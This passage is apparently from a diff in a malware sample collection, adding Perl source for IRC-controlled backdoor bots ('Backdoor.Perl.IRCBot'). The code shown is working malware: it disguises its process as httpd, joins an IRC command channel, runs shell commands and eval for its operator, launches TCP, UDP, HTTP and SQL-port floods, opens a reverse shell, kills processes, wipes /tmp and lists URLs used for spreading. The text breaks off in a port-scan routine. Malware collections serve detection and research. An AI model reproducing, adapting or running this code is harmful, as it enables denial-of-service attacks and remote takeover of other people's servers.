"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", + "Microsoft Pocket Internet Explorer/0.6", + "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)", + "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;", + "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)", + "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)", + "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)", + "Advanced Browser (http://www.avantbrowser.com)", + "Avant Browser (http://www.avantbrowser.com)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)", + "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)", + "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)", + "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007", + "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511", + "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0", + "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox", + "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4", + "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6", + "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", + "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", + "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", + "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", + "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b", + "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0", + "Mozilla/3.0 (OS/2; U)", + "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)", + "Mozilla/4.61 (Macintosh; I; PPC)", + "Mozilla/4.61 [en] (OS/2; U)", + "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)", + "Mozilla/4.8 [en] (Windows NT 5.0; U)" ); +return(@ret); +} + + +###################### +# End of MAILER # +###################### +# A /tmp cleaner +if ($funcarg =~ /^cleartmp/) { + system 'cd /tmp;rm -rf *'; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] /tmp is Cleaned"); + } +#-#-#-#-#-#-#-#-# +# Flooders IRC # +#-#-#-#-#-#-#-#-# +# msg, @msgflood <who> +if ($funcarg =~ /^msgflood (.+?) (.*)/) { + for($i=0; $i<=10; $i+=1){ + sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Msg Flood Excecuted on ".$1." "); +} + +# dccflood, @dccflood <who> +if ($funcarg =~ /^dccflood (.*)/) { + for($i=0; $i<=10; $i+=1){ + sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] DcpFlood Excecuted on ".$1." "); +} +# ctcpflood, @ctcpflood <who> +if ($funcarg =~ /^ctcpflood (.*)/) { + for($i=0; $i<=10; $i+=1){ + sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n"); + sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Tcp Flood Excecuted on ".$1." "); +} +# noticeflood, @noticeflood <who> + if ($funcarg =~ /^noticeflood (.*)/) { + for($i=0; $i<=10; $i+=1){ + sendraw($IRC_cur_socket, "NOTICE ".$1." :w3tFL00D\n"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Notice Flood Excecuted on ".$1." "); +} +# Channel Flood, @channelflood +if ($funcarg =~ /^channelflood/) { + for($i=0; $i<=25; $i+=1){ + sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) ); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Channel Flood Excecuted "); +} +# Maxi Flood, @maxiflood +if ($funcarg =~ /^maxiflood(.*)/) { + for($i=0; $i<=15; $i+=1){ + sendraw($IRC_cur_socket, "NOTICE ".$1." :w3tFl00D\n"); + sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n"); + sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n"); + sendraw($IRC_cur_socket, "PRIVMSG ".$1." :w3tFl00D\n"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] All Flood Excecuted on ".$1." "); +} +###################### +# irc # +###################### + if ($funcarg =~ /^reset/) { + sendraw($IRC_cur_socket, "QUIT :"); + } + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + if ($funcarg =~ /^voice (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl +v ".$1); + } + if ($funcarg =~ /^devoice (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl -v ".$1); + } + if ($funcarg =~ /^halfop (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl +h ".$1); + } + if ($funcarg =~ /^dehalfop (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl -h ".$1); + } + if ($funcarg =~ /^owner (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl +q ".$1); + } + if ($funcarg =~ /^deowner (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl -q ".$1); + } + if ($funcarg =~ /^op (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl +o ".$1); + } + if ($funcarg =~ /^deop (.*)/) { + sendraw($IRC_cur_socket, "MODE $printl -o ".$1); + } +###################### +#End of Join And Part# +###################### +###################### +# TCPFlood # +###################### + + if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Tcp Ddos Attacking ".$1.":".$2." for ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); + } + sendraw($IRC_cur_socket,"PRIVMSG $printl :[Voo|Doo] Tcp Ddos Attack done ".$1.":".$2."."); + } +###################### +# End of TCPFlood # +###################### +###################### +# SQL Fl00dEr # +###################### +if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql Ddos Attacking ".$1." on port 3306 for ".$2." seconds."); +my $itime = time; +my ($cur_time); +$cur_time = time - $itime; +while ($2>$cur_time){ +$cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql Attacking done ".$1."."); +} +###################### +# Back Connect # + +###################### + if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { + my $host = "$1"; + my $porta = "$2"; + my $proto = getprotobyname('tcp'); + my $iaddr = inet_aton($host); + my $paddr = sockaddr_in($porta, $iaddr); + my $shell = "/bin/sh -i"; + if ($^O eq "MSWin32") { + $shell = "cmd.exe"; + } + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; + connect(SOCKET, $paddr) or die "connect: $!"; + open(STDIN, ">&SOCKET"); + open(STDOUT, ">&SOCKET"); + open(STDERR, ">&SOCKET"); + system("$shell"); + close(STDIN); + close(STDOUT); + close(STDERR); + if ($estatisticas){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Back Connecting to $host:$porta"); + } + } +###################### +#End of Back Connect# +###################### + +###################### +#End of MultiSCANNER # +###################### +if ($funcarg =~ /^killer/) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]Pid Killing."); + system("crontab -r"); + $PID = $$; + @PIDS = `ps x |awk '{print \$1;}'`; + foreach my $pidi(@PIDS){ + if($pidi == $PID){ + return; + }else{ + system("kill -9 $pidi"); + } + } + } +###################### +# HTTPFlood # +###################### + if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Http Flood Attacking ".$1." on port 80 for ".$2." seconds ."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Http-Ddos Attacking done ".$1."."); + } +###################### +# End of HTTPFlood # +###################### +###################### +# UDPFlood # +###################### + if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Udp Attacking ".$1." with ".$2." Kb Packets for ".$3." seconds."); + my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Udp Results ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); + } +###################### +# End of Udpflood # +###################### + exit; + } + } + +sub ircase { + my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + + if ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + + if ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + + if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + + if ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + + if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + + if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} + +sub get_html() { +$test=$_[0]; + + $ip=$_[1]; + $port=$_[2]; + +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +if(defined($ip) && defined($port)) { + $ua->proxy("http","http://$ip:$port/"); + $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); +} +$ua->timeout(1); +my $response=$ua->request($req); +if ($response->is_success) { + $re=$response->content; +} +return $re; +} + +sub addproc { + + my $proc=$_[0]; + my $dork=$_[1]; + + open(FILE,">>/tmp/pids"); + print FILE $proc." [".$irc_servers{$IRC_cur_socket}{'nick'}."] $dork\n"; + close(FILE); +} + + +sub delproc { + + my $proc=$_[0]; + open(FILE,"/tmp/pids"); + + while(<FILE>) { + $_ =~ /(\d+)\s+(.*)/; + $childs{$1}=$2; + } + close(FILE); + delete($childs{$proc}); + + open(FILE,">/tmp/pids"); + + for $klucz (keys %childs) { + print FILE $klucz." ".$childs{$klucz}."\n"; + } +} + +sub shell { + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "No such file or directory"); + return; + } elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +sub tcpflooder { + my $itime = time; + my ($cur_time); + my ($ia,$pa,$proto,$j,$l,$t); + $ia=inet_aton($_[0]); + $pa=sockaddr_in($_[1],$ia); + $ftime=$_[2]; + $proto=getprotobyname('tcp'); + $j=0;$l=0; + $cur_time = time - $itime; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + socket($t,PF_INET,SOCK_STREAM,$proto); + connect($t,$pa)||$j--; + $j++; + $l++; + } + $l=0; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + shutdown($t,2); + $l++; + } +} + +sub udpflooder { + my $iaddr = inet_aton($_[0]); + my $msg = 'A' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65000; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { + &join(@_); +} + +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} + +sub p { + part(@_); +} + +sub part { + sendraw("PART $_[0]"); +} + +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} + +sub quit { + sendraw("QUIT :$_[0]"); +} + +sub fetch(){ + my $rnd=(int(rand(9999))); + my $n= 80; + if ($rnd<5000) { + $n<<=1; + } + my $s= (int(rand(10)) * $n); + my @dominios = ("removed-them-all"); + my @str; + foreach $dom (@dominios){ + push (@str,"@gstring"); + } + my $query="www.google.com/search?q="; + $query.=$str[(rand(scalar(@str)))]; + $query.="&num=$n&start=$s"; + my @lst=(); + sendraw("privmsg #debug :DEBUG only test googling: ".$query.""); + my $page = http_query($query); + while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){ + if ($1 !~ m/google|cache|translate/){ + push (@lst,$1); + } + } + return (@lst); + + + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp", Timeout=>"5") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp", Timeout=>"5") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +}} + diff --git a/Perl/Backdoor.Perl.IRCBot.ac b/Perl/Backdoor.Perl.IRCBot.ac new file mode 100644 index 00000000..cbdfc616 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.ac @@ -0,0 +1,1721 @@ + +use HTTP::Request; +use LWP::UserAgent; + +my $processo = '[/usr/sbin/httpd]'; + +my $linas_max='10'; +my $sleep='3'; + +my $cmd="http://usuarios.lycos.es/servius/id.txt??"; +my $id="http://usuarios.lycos.es/servius/id.txt??"; +my $spread="http://usuarios.lycos.es/servius/spreunkn.txt???"; +my $spread2="http://usuarios.lycos.es/servius/spread2.txt??"; + +my @adms=("pOlk"); +my @canais=("#unknown"); + +my $nick="[DOD]-".(int(rand(100))); +my $ircname ='4a3in'; +chop (my $realname = 'demittegal '); + +$servidor='irc.indoirc.net' unless $servidor; +my $porta='6667'; + +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; + +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); + +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else {#342 + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 MaXiMiZeR\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + +#End of Connect + +###################### +# PREFIX # +###################### + + if ($args =~ /^(\Q$meunick\E|\!max)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!max" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } +} +} +###################### +# End of PREFIX # +###################### + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { +if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +} +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { +nick("$meunick".int rand(999999)); +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { +$meunick = $2; +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; +foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); +} +} +} + +sub bfunc { +my $printl = $_[0]; +my $funcarg = $_[1]; +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { + exit; +} else { + +###################### +# Help # +###################### + +if ($funcarg =~ /^help/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :3,14 11How To Use 3[7U3]8nknown3[7BOT3] "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7 Linux Commands "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4portscan <ip> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4nmap <ip> <beginport> <endport> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4back <ip><port> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4udpflood <ip> <packet size> <time> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4tcpflood <ip> <port> <packet size> <time> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4httpflood <site> <time> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4rfi <vuln> <dork> "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4logcleaner "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4milw0rm "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4join #channel "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4part #channel "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4spread ~/OFF/~ "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4Pbots ~/OFF/~ "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :12 My boss is pOlk"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :9,14*************************"); +} + + +###################### +# End of Help # +###################### + +###################### +# Commands # +###################### + + +if ($funcarg =~ /^milw0rm/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/<title>(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + }} + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + }} + sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Milw0rm12]15 Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Milw0rm12]9 $bug[$x] - 8$ltt[$x]"); + sleep 1; +}} + +###################### +# Portscan # +###################### + +if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my + @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG 